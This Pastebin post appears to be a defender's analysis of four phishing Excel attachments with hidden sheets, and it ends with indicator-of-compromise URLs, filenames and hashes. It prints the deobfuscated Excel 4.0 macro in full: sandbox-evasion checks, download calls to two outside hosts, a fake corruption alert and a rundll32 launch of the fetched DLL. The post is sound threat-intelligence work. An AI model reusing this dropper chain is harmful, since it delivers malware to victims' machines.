Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SENDERS
- SUBJECTS
- Second claim for debt
- Undelivered fax documents
- Unsent fax receipt's
- Your Reminder for Invoice - Honey man
- ANALYSIS LINKS
- https://www.virustotal.com/gui/url/c5bb6572b39cf7700ad78a16f41961428da3ceefd6ae6c4fe57f3119bab6e820/detection
- https://www.virustotal.com/gui/url/3224d47bcf9287e8c0e7959a5c5a6c2d9c06762a5df1cf59150af41a505646a7/detection
- https://twitter.com/DynamicAnalysis/status/1243613560170823681
- OVERVIEW
- Four Excel spreadhseets - all with a "VeryHidden" worksheet.
- LibreOffice can find and reveal these.
- Open file in LibreOffice
- Right click the "Sheet1" tab and select "Show Sheet".
- A box pops up with the hidden sheet - select it and press OK
- The other nice thing about using LibreOffice is that the =char() information is all converted so you can see the commands.
- I copied each column of Char codes into Sublime and removed the \n to pull everything up to a single horizontal line.
- The macros are all the same:
- =IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)
- =IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)
- =IF(GET.WORKSPACE(19),,CLOSE(TRUE))
- =IF(GET.WORKSPACE(42),,CLOSE(TRUE))
- =IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(TRUE))
- =CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://cdncloudtech.xyz/bag4hy","c:\Users\Public\cogp5yf.html",0,0)
- =IF(R[-1]C<0,CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://waitupdate.xyz/deg34g","c:\Users\Public\cogp5yf.html",0,0),)
- =ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
- =CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\cogp5yf.html,DllRegisterServer",0,5)
- =CLOSE(FALSE)
- IOCs
- ==========================
- https://cdncloudtech.xyz/bag4hy
- http://waitupdate.xyz/deg34g
- report-218.xls
- cb6ae0be54a2ef0a07aebebd4c7935f7
- Case_inf_23577.xls
- db3c4de218a06a568ca05bd0f0064416
- claim.062842.xls
- ff555143306c208de55b312e42d82118
- Incoming.Invoice_48898.xls
- 5937e2decff47874577249235f98769f
- First download from: https://cdncloudtech.xyz/bag4hy
- calc.dll
- 62cb6a2a517351472698f669a845f91c
- Second download is no longer available: https://waitupdate.xyz/deg34g
- Returns 503
Advertisement
Add Comment
Please, Sign In to add comment